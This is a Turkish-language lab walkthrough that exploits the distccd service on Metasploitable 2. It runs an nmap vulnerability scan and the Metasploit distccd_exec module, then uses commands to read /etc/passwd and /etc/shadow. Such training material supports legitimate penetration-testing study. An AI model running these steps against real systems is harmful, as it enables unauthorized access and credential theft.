Not: Benzer zafiyet VulnOS: 1 sanal makinesinde de bulunmaktadır. VulnOS: 1 sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/vulnos-1,60/
IP adresi 100.100.200.7 olan Metasploitable 2, Nmap ile taratıldığında TCP 3632. portta distccd’in hizmet verdiği görülmektedir.
Distccd servisine ait zafiyetler Nmap’in betikleri ile bulunabilmiştir.
nmap 100.100.200.7 -p 3632 -Pn -n –script vuln
Bunun yanında CVE detayları da aşağıdaki gibidir.
İstismar işlemi için Metaplosploit Framework içerisindeki distccd_exec istismar modülü kullanılabilir.
search distccd
use exploit/unix/misc/distccd_exec
show options
MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir.
set RHOST 100.100.200.7
exploit
whoami
cat /etc/shadow
cat /etc/passwd
Servisi çalıştıran hesap (daemon) yetkileri az olduğu için /etc/shadow dosyasını okuyamamıştır.
Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:
- VulnOS 1: https://www.vulnhub.com/entry/vulnos-1,60/
- Port: 3632